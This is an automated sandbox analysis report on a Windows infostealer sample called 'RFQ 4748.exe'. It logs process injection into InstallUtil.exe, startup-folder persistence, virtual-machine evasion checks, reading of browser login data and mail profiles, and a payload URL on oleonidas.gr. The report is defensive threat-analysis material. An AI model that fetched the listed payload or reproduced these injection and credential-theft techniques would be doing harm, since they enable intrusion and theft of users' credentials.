                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96860Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96735Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96453Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96335Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96208Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96078Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95969Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95860Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95735Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95485Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95360Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95235Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95110Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 94985Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 94860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598607Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597949Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597715Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597599Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595208Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595049Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594811Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: InstallUtil.exe, 00000002.00000002.4493847698.0000000000EB9000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpQ!
                  Source: Fallback.exe, 00000005.00000002.2288151559.000000000336C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: Fallback.exe, 00000005.00000002.2288151559.000000000336C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: model0Microsoft|VMWare|Virtual
                  Source: RFQ 4748.exe, 00000000.00000002.2088528133.0000000001092000.00000004.00000020.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2286946113.0000000001634000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4493267308.0000000000B56000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: A36008
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 96E008
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Windows\System32\wscript.exe; Process created: C:\Users\user\AppData\Roaming\Fallback.exe "C:\Users\user\AppData\Roaming\Fallback.exe"
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Queries volume information: C:\Users\user\Desktop\RFQ 4748.exe VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe; Queries volume information: C:\Users\user\AppData\Roaming\Fallback.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ 4748.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match; File source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 360, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 3652, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara match; File source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 360, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 3652, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match; File source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 360, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 3652, type: MEMORYSTR

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 111 Scripting | Valid Accounts | 1 Scheduled Task/Job | 111 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 211 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 21 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 2 Registry Run Keys / Startup Folder | 1 Software Packing | NTDS | 21 Security Software Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 211 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |

                  [Behavior Graph: ID 1551956, Sample: RFQ 4748.exe, Start date: 08/11/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| RFQ 4748.exe | 32% | ReversingLabs | | |
| RFQ 4748.exe | 100% | Avira | HEUR/AGEN.1309900 | |
| RFQ 4748.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Roaming\Fallback.exe | 100% | Avira | HEUR/AGEN.1309900 | |
| C:\Users\user\AppData\Roaming\Fallback.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Roaming\Fallback.exe | 32% | ReversingLabs | | |

No Antivirus matches

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://www.oleonidas.gr | 0% | Avira URL Cloud | safe | |
| https://www.oleonidas.gr/slim/Knlpdavcfrw.vdf | 0% | Avira URL Cloud | safe | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| oleonidas.gr | 185.78.221.73 | true | false | | unknown |
| reallyfreegeoip.org | 188.114.96.3 | true | false | | high |
| checkip.dyndns.com | 193.122.6.168 | true | false | | high |
| www.oleonidas.gr | unknown | unknown | true | | unknown |
| checkip.dyndns.org | unknown | unknown | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://www.oleonidas.gr/slim/Knlpdavcfrw.vdf | false | Avira URL Cloud: safe | unknown |
| http://checkip.dyndns.org/ | false | | high |
| https://reallyfreegeoip.org/xml/173.254.250.90 | false | | high |

00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.comInstallUtil.exe, 00000002.00000002.4496477218.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002C69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.oleonidas.grRFQ 4748.exe, 00000000.00000002.2089151863.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.00000000032C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ 4748.exe, 00000000.00000002.2089151863.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002911000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://reallyfreegeoip.org/xml/RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002C69000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
185.78.221.73 | oleonidas.gr | Greece | 47521 | IPHOSTGRIpDomainGR | false
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1551956
                                                            Start date and time:2024-11-08 11:50:20 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 54s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:8
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:RFQ 4748.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 96%
                                                            • Number of executed functions: 483
                                                            • Number of non-executed functions: 35
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target InstallUtil.exe, PID 360 because it is empty
                                                            • Execution Graph export aborted for target InstallUtil.exe, PID 3652 because it is empty
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: RFQ 4748.exe
Time | Type | Description
05:51:09 | API Interceptor | 46x Sleep call for process: RFQ 4748.exe modified
05:51:18 | API Interceptor | 13074180x Sleep call for process: InstallUtil.exe modified
05:51:28 | API Interceptor | 42x Sleep call for process: Fallback.exe modified
11:51:19 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs
                                                            Process:C:\Users\user\Desktop\RFQ 4748.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
